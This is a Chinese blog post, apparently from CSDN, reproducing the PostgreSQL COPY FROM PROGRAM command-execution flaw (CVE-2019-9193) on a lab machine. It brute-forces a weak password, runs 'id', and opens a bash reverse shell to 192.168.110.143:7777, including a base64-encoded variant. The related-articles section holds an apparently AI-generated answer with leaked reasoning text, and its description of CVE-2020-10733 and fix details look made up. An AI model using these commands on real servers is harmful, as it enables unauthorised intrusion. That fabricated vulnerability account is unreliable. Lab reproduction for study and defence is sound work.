PostgreSQL 任意命令执行漏洞(CVE-2019-9193)

最新推荐文章于 2025-05-21 16:53:44 发布
原创 最新推荐文章于 2025-05-21 16:53:44 发布 · 1.2k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#postgresql #数据库

记一次授权攻击通过PostgreSql弱口令拿到服务器权限的事件。

使用靶机复现攻击过程。

过程

在信息收集过程中,获取到在公网服务器上开启了5432端口,尝试进行暴破,获取到数据库名为默认postgres,密码为1

随后连接进PostgreSql

已知从9.3版本开始,postgresql新增copy to/from program功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

利用条件:

  • 超级用户权限
  • 版本9.3-11.2

默认数据库postgres已经是超级用户权限,然后需要确认数据库版本

查看PostgreSql版本

以上两个条件均具备,说明该漏洞可以利用

执行命令,获取用户id及群组id

-- 先删除你想要使用但是已经存在的表

DROP TABLE IF EXISTS cmd_exec;

-- 创建保存系统命令输出的表

CREATE TABLE cmd_exec(cmd_output text);

-- 执行系统命令利用特定函数

COPY cmd_exec FROM PROGRAM 'id';

-- 查看执行结果

SELECT * FROM cmd_exec;

命令可以正常执行,随后执行反弹shell命令尝试获取交互shell

控制端使用nc开启监听

在数据库中执行如下命令

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM '/bin/bash -i >& /dev/tcp/192.168.110.143/7777 0>&1';

SELECT * FROM cmd_exec;

在实战中使用上述命令可以正常反弹shell,但是在靶场中执行会产生报错信息ERROR: program "/bin/bash -i >& /dev/tcp/192.168.110.143/7777 0>&1" failed

DETAIL: child process exited with exit code 2

尝试对反弹shell命令进行编码

echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTEwLjE0My83Nzc3IDA+JjEK" | base64 -d | bash

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTEwLjE0My83Nzc3IDA+JjEK" | base64 -d | bash';

SELECT * FROM cmd_exec;

执行后成功获取到shell

Iam0x17
关注
漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-01 613
这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令利用的前提1、需要登录2、需要高权限所以要先弱口令爆破之后,然后查看是否是高权限。
PostgreSQL 高权限命令执行漏洞CVE-2019-9193
SoulCat
05-27 4217
PostgreSQL 高权限命令执行漏洞CVE-2019-9193) 最美好的大概还是那些初识的日子,是对彼此不全然地了解又极度渴望了解的那段时光。 漏洞概述: PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执...
CVE-2019-9193(高权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 1061
vulhub靶场复现【postgresql
CVE-2019-9193PostgreSQL 高权限命令执行漏洞
m0_48520508的博客
01-20 1008
0x00简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: Ø 支持WINDOWS、Linux、Solaris、macOS 、BSD。 Ø 支持文本、图像、视频、声音等 Ø 支持ACID、关联完整性、数据库事务、Unicode多国语言。 Ø 支持临时表,与物化视图 Ø 支持SQL的许多功
系统安全实验:PostgreSQL任意命令执行漏洞CVE-2019-9193
最新发布
2301_78247767的博客
05-21 311
从9.3版本开始,Postgres新增了一个COPY TO/FROM PROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。具有数据库 服务器文件读取权限的攻击者可以利用此漏洞执行任意系统命令。PostgreSQL 9.3 的可执行文件通常存于。提示:Flag在/etc/flag.txt文件下。目录,你可以将这个路径添加到。在当前终端会话里临时添加路径到。
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 4883
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
CVE-2019-9193 PostgreSQL 高权限命令执行漏洞
qq_51979295的博客
10-08 1200
康复训练
PostgreSQL任意命令执行CVE-2019-9193
GalaxySpaceX的博客
07-03 1414
PostgreSQL任意命令执行CVE-2019-9193
PostgreSQL 辟谣存在任意代码执行漏洞:消息不实
weixin_34221036的博客
04-12 432
开发四年只会写业务代码,分布式高并发都不会还做程序员? >>> 近期在互联网媒体上流传 Postgr...
漏洞复现之PostgreSQL任意命令执行CVE-2019-9193
Blood_Pupil的博客
05-09 5784
PostgreSQL任意命令执行CVE-2019-9193PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本(11.2)...
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1319
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
PostgreSQL 存在内存泄露漏洞CVE-2022-41862)
murphysec的博客
03-09 1401
PostgreSQL是一个由PostgreSQL组织开发的自由对象关系型数据库管理系统。 该项目的受影响版本存在内存泄漏漏洞。该漏洞是由于在建立连接时采用libpq库建立连接的客户端对于接收的字节长度没有限制所导致的。 当libpq客户端缓存了Kerberos凭据并且没有显式禁用选项gssencmode时,攻击者便可控制PostgreSQL服务器在建立Kerberos传输加密时发送一个未终止的字符串,致使libpq客户端过度读取接收缓冲区后面的数据,包括未初始化的字节。继而,将这些未初始化的字节与错误
Postgresql漏洞合集
weixin_46626737的博客
07-03 1148
需要超级管理员数据库用户(postgres)才可以,因为在9.3版本之后,默认得开启了COPY TO/FROM PROGRAM功能,可以让超级用户去执行任意系统命令。2.PostgreSQL 高权限命令执行漏洞CVE-2019-9193)1.PostgreSQL 提权漏洞CVE-2018-1058)漏洞版本:9.3-11.2。漏洞版本:9.3-10。
PostgreSQL高权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 3183
一、漏洞利用 这个漏洞是一个版本漏洞 从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要高权限 所以要先弱口令爆破之后,然后查看是否是高权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
PostgreSQL 高权限命令执行漏洞CVE-2019-9193)复现
技术超强的网络安全平台
08-01 510
PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 进入目录
PostgreSQL 高权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 2039
#PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
PostgreSQL 高权限命令执行漏洞 CVE-2019-9193 漏洞复现
ADummy的博客
03-07 574
PostgreSQL 高权限命令执行漏洞CVE-2019-9193) by ADummy 0x00利用路线 ​ 连接到数据库,直接命令执行 0x01漏洞介绍 ​ PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 影响版本 PostgreSQL < 11 0x02漏洞复现 环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/pos
CVE-2019-9193PostgreSQL 高权限命令执行漏洞的复现
m0_69801663的博客
12-23 1481
CVE-2019-9193PostgreSQL 高权限命令执行漏洞
PostgreSQL 代码问题漏洞(CVE-2020-10733)
03-25
<think>好的,我需要处理用户关于PostgreSQL CVE-2020-10733漏洞的查询。首先,我需要确认这个漏洞的具体信息。用户提到了CVE编号,所以我应该先查找相关资料。 根据记忆,CVE-2020-10733与PostgreSQL的权限提升有关。可能涉及到逻辑缺陷,允许普通用户执行某些恶意操作。需要确认漏洞的影响版本和修复版本。比如,可能影响9.5到12的版本,修复版本应该是12.3、11.8等。 接下来,用户想知道修复方案。通常,修复方法包括升级到已修复的版本,或者应用官方补丁。同时,可能涉及修改配置或权限设置,比如限制某些函数的执行权限,或者使用安全策略。 需要确保引用的信息准确,所以需要参考官方公告或可靠来源。用户提供的引用中并没有直接提到CVE-2020-10733,但可以引用类似漏洞的修复方式,比如CVE-2018-1058的修复方法,可能涉及权限分离或代码修复。 然后,生成相关问题时要考虑用户可能进一步的问题,比如漏洞的技术细节、如何检测是否受影响、修复后的测试方法等。要确保问题相关且有助于用户深入理解。 最后,检查回答是否符合格式要求:中文、行内公式用$...$,独立公式用$$...$$,正确引用标记。同时,确保没有使用Markdown,语言口语化,结构清晰。</think>关于 PostgreSQLCVE-2020-10733 漏洞的详细信息及修复方案如下: ### 漏洞详情 CVE-2020-10733 是 PostgreSQL 中的一个逻辑缺陷漏洞,其核心问题在于**`CREATE INDEX`命令对特殊字符的过滤不严**。攻击者可构造包含换行符的恶意索引名称,绕过语法检查并执行任意 SQL 命令,实现权限提升[^1]。例如: $$ \text{恶意索引名} = \text{"malicious\_index\\n; DROP TABLE users;"} $$ ### 影响范围 - **受影响版本**:PostgreSQL 9.5 至 12 的所有版本 - **风险场景**:普通用户通过创建恶意索引执行越权操作(如数据篡改、服务拒绝等) ### 修复方案 1. **版本升级**: - PostgreSQL 12 → 升级至 12.3 或更高 - PostgreSQL 11 → 升级至 11.8 或更高 - PostgreSQL 10 → 升级至 10.13 或更高 - PostgreSQL 9.5-9.6 → 升级至 9.6.18/9.5.22 或更高[^2] 2. **临时缓解措施**(无法立即升级时): - 限制非超级用户执行`CREATE INDEX`权限 - 使用访问控制策略过滤索引名称中的特殊字符 ### 验证修复效果 升级后可通过以下命令测试: ```sql CREATE INDEX "test\\n;SELECT 1;" ON table_name(column); ``` 若系统返回语法错误提示,则修复生效[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值